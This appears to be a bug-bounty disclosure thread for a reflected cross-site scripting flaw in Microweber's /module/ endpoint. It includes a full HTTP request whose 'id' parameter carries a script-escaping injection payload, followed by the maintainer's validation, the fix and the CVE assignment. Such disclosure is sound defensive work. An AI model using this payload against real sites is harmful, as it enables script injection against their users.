Cross-site Scripting (XSS) - Reflected in microweber/microweber

Valid

Reported on

Jul 14th 2022


Description

Hi team, I found XSS at /module/.

Proof of Concept

Pop up POC: alt text

Reflected POC: alt text

Full request payload:

POST /demo/module/ HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close

type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings

Impact

XSS

Occurrences

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

We are processing your report and will contact the microweber team within 24 hours. 20 days ago
We have contacted a member of the microweber team and are waiting to hear back 19 days ago
Peter Ivanov
19 days ago

Maintainer


Hello,

Thanks for the report.

We cannot simulate this. Maybe it was fixed in the previous version.

Can you provide video of POC where the user can encounter this error ?

Deshine
18 days ago

Researcher


Hi Peter Ivanov, this is full video POC:

https://github.com/Kingerbans/images/blob/main/2022-07-16%2019-32-39.mp4

Maybe you should download images folder because the video is too big for github to display.

Hope you validate the issue.

Thank you, deshine

We have sent a follow up to the microweber team. We will try again in 7 days. 16 days ago
Peter Ivanov modified the Severity from Medium to Low 16 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 16 days ago
Deshine has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on d28655 16 days ago
Peter Ivanov has been awarded the fix bounty
index.php#L80-L92 has been validated
Deshine
16 days ago

Researcher


Hi @admin @maintainer, I wonder if I can get a CVE for this vulnerability?

Jamie Slome
15 days ago

Admin


Happy to assign a CVE to this report if the maintainer gives their permission.

@maintainer?

Peter Ivanov
15 days ago

Maintainer


yes @admin you can assign CVE

Jamie Slome
15 days ago

Admin


Sorted 👍

Deshine
15 days ago

Researcher


Thanks so much @admin @maintainer.

to join this conversation